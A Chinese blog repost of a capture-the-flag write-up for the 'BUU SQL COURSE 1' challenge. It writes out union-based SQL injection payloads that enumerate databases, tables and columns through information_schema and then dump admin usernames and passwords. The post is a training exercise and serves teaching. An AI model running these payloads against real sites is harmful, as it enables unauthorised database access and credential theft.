大家好,我是考100分的小小码 ,祝大家学习进步,加薪顺利呀。今天说一说BUU SQL COURSE 1[亲测有效],希望您对编程的造诣更进一步.
![BUU SQL COURSE 1[数据库教程]](https://www.yht7.com/upload/image/images/imgsql/17.jpg "BUU SQL COURSE 1[亲测有效]插图")
0x01 题目分析
通过题目可以了解到这是一个SQL注入的题,但是打开网站后观察URL、对登录框抓包尝试后都无果。
这时就很迷,最后只能用老办法看看源码啥的有没有提示
经过观察发现了一个隐藏的URL(心理想:这题是真的鬼[○?`Д′? ○])
0x02 开始测试
利用and 1=1 和 and 1=2根据页面回显进行判断
利用order by 进行字段查看
进行回显判断
下面就可以进行暴库、暴表、暴字段的操作了
1 暴库:(information_schema,ctftraining,mysql,performance_schema,test,news) 2 ?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema.schemata 3 4 暴表:(admin,contents) 5 ?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news" 6 7 暴字段:(id,username,password) 8 ?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin" 9 10 暴密码: 11 ?id=-1 UNION SELECT 1,concat(username,0x3a,password) from admin
Mysql中concat和group_concat的用法:https://baijiahao.baidu.com/s?id=1595349117525189591&wfr=spider&for=pc
最后出来了账号密码:
利用账号密码进行登录
BUU SQL COURSE 1
原文地址:https://www.cnblogs.com/nmlwh/p/14724551.html
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
转载请注明出处: https://daima100.com/6215.html
